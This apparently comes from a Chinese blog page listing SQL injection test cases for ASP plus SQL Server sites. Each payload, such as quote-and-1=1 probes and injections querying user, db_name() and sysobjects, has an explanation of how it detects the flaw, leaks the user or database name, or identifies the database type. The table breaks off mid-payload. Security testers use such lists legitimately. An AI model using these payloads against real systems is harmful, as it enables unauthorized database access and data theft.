SQL注入攻击测试用例 |
说明 |
Night-- Night’ and 1=1-- |
判断是否存在注入漏洞。SQL Server中的行注释符号为”--” |
URL;and user>0-- |
User 是SQL Server的一个内置变量,它的值是当前连接的用户名,数据类型为nvarchar。它的值是当前连接的用户名,数据类型为nvarchar。用nvarchar类型与int类型比较会引起错误,而SQL Server在返回的错误信息中往往会暴露出user的值;将nvarchar值“XXX”转换数据类型为int的列时发生语法错误。 |
URL;and db_name()>0-- |
获取数据库名称 |
URL;and (select count(*) from sysobjects)>0—
|
msysobjects是Access 数据库的系统表,sysobjects是SQL Server的系统表。通过这两次攻击尝试,可以从服务器的反馈中辨别出服务器使用的数据库类型. |
URL;and (select count(*) from msysobjects)>0-- |
|
Night’ and (select count(*) from sysobjects where Xtype=’u’ and status> |
ASP+SQL Server SQL 注入攻击测试用例
最新推荐文章于 2023-09-27 01:13:04 发布
本文探讨了针对ASP结合SQL Server应用的SQL注入攻击,通过具体的测试用例展示如何进行安全测试。了解攻击手段有助于开发者更好地防御此类威胁,提升应用程序的安全性。
摘要由CSDN通过智能技术生成